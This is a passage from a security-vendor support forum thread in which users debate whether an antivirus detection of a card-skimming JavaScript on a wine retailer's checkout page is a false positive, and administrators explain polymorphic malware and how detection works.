Jump to content

s/spy.banker.iv false positive or true ?


Recommended Posts

Hello, a customer informs me that his Eset antivirus detects the js/spy.banker virus on this page: https://www.domainedestrottieres.com/commande could you help me because only eset finds this virus. THANKS

Link to comment
Share on other sites

Also Eset is detecting the malicious script on the web site page where actual product ordering is performed; i.e payment method details are entered.

Link to comment
Share on other sites

  • Administrators
4 hours ago, rotaru said:

This:

domainedestrottieres.com

generates ZERO detections on VT

Not detections but url blacklists. Since it's a legitimate site that was infected with malware, we are not going to blacklist it completely. Blacklisting whole sites make sense especially when they are created for malicious purposes.

Link to comment
Share on other sites

Hello,

thank you for your feedback. but I still don't understand, I have the same results as rotaru on VT. is there something or not? Why does Marcos get a positive?

thanks again

Link to comment
Share on other sites

  • Administrators
1 minute ago, franck said:

thank you for your feedback. but I still don't understand, I have the same results as rotaru on VT. is there something or not? Why does Marcos get a positive?

That's because you did a check if the website url is blacklisted by AVs while I scanned the file that contained the malicious JS. So it's like comparing apples with oranges, blacklisted urls and html files with malware are two different things.

Link to comment
Share on other sites

  • Administrators
4 minutes ago, franck said:

one more question, what is the infected js file?

The url where the malware was detected can be found in the Detections logs. In this case it was

https://www.domainedestrottieres.com/commande

 

Link to comment
Share on other sites

1 hour ago, Marcos said:

while I scanned the file

So, I want to reproduce the detection.

 

What exactly did you download??? This is a site where you can place orders for vines, I couldn't "download" anything.

Link to comment
Share on other sites

9 hours ago, rotaru said:

Checked the website with Quttera  , which downloaded 99 files, analized for 5 minutes and this is the result:

Go here: https://www.domainedestrottieres.com/blancs-cremants/9-anjou-chenin-clair-de-lune-75-cl.html

Mouse click on the shopping cart tab located in Visa/Mastercard area of the web page.

On the next web page displayed, mouse click on the "Commander" button:

Eset_Detection.thumb.png.82bb05392ca621e05f0b103f9259aec8.png

Appears the malware is one of the card credential data stealing variants.

 

Edited by itman
Link to comment
Share on other sites

In regards to this specific web site, it is using outdated php software as noted in this Sucuri analysis: https://sitecheck.sucuri.net/results/https/www.domainedestrottieres.com/commande . This means that even if the JavaScript malware is removed, they will probably be exploited again with it.

Link to comment
Share on other sites

33 minutes ago, itman said:

In regards to this specific web site, it is using outdated php software as noted in this Sucuri analysis: https://sitecheck.sucuri.net/results/https/www.domainedestrottieres.com/commande . This means that even if the JavaScript malware is removed, they will probably be exploited again with it.

May be "outdated" but it is not determined to be malicious or blacklisted:

 

image.png.ceb5ec6ce506b4d0fac995fbb338b0d0.png

Link to comment
Share on other sites

One other thing about the JavaScript malware. It's polymorphic. I have 5 Eset log entries for it and each has a different hash value. An additional reason why the online web site scanners can't detect it.

Edited by itman
Link to comment
Share on other sites

31 minutes ago, rotaru said:

May be "outdated" but it is not determined to be malicious or blacklisted:

Refer to this prior posting: https://forum.eset.com/topic/35944-sspybankeriv-false-positive-or-true/?do=findComment&comment=164956 . Note the VT embedded-js reference. Next, open the Sucuri analysis again and refer to the JavaScript's that exist.

Bottom line is the script is hidden and the online web scanners didn't know it existed.

 

Link to comment
Share on other sites

14 minutes ago, itman said:

I have 5 Eset log entries for it and each has a different hash value. An additional reason why the online web site scanners can't detect it.

Hello Itman,

Thank you for your patience!

ESET is famous for "exotic" detections. I, as a regular user , I did everything possible to replicate a detection

  • checked the website on VT
  • checked the website with Quttera
  • I replicated the steps indicated on your post with 3 different AVs

Yet , I did not get any detection; the fact that you have  "5 Eset log entries for it and each has a different hash value" is not encouraging, on the contrary , demonstrates inconsistency rather than detection.

I am confused!

 

Link to comment
Share on other sites

1 hour ago, rotaru said:

Yet , I did not get any detection; the fact that you have  "5 Eset log entries for it and each has a different hash value" is not encouraging, on the contrary , demonstrates inconsistency rather than detection.

First, I advise you read up on Eset's protection mechanisms here: https://www.eset.com/fileadmin/ESET/US/docs/about/ESET-Technology-Whitepaper.pdf . The one I will reference here is DNA detections.

A favorite trick among malware creators is to slightly modify their scripts, and binaries also, to try to avoid AV's static signature detection. Eset's DNA detection employs "smart" signatures that record malware code and behavior "snippets" which are portions of a malicious script or binary. This allows Eset to detect modified malware variants; also known as polymorphic malware. Also in this regard, Eset has one of the best "smart" signatures among all security products.

As far as this web site goes, it appears the web server is compromised. This allows the attacker to "serve up" a modified script each time the "Order" button is selected. 

Edited by itman
Link to comment
Share on other sites

1 hour ago, itman said:

Eset has one of the best "smart" signatures

That could be, however for a regular user who would show do diligence and check the "detection" on multiple sites only to get ZERO results , this is confusing.

 

On top of that , ESET detection says "This website may contain dangerous..."

So, is may . Which can be may not. So , when you check it in 6-7 places and the result is ZERO , sure may not seems the real choice.

But enough talking, sure ESET is doing a fine job.

But not for me.

Link to comment
Share on other sites

13 hours ago, rotaru said:

That could be, however for a regular user who would show do diligence and check the "detection" on multiple sites only to get ZERO results , this is confusing.

The on-line web site scanners also reference VT results and factor those into their final determination result. None of the hashes for the 5 variants of this script in my Eset Detection log are known to VT. One other very important point. These scanners only scan via HTTP connection; not via HTTPS. This web site connection where the malware exists only can be accessed via HTTPS.

As far as other AV solutions being able to detect this malware, some can. Refer to @Marcos prior posting here: https://forum.eset.com/topic/35944-sspybankeriv-false-positive-or-true/?do=findComment&comment=164956

Edited by itman
Link to comment
Share on other sites

  • Administrators

I strongly discourage you from opening websites on physical machines that another person reports as possibly infected. And yes, the detection occurs under specific conditions.

Link to comment
Share on other sites

Guest
This topic is now closed to further replies.
  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...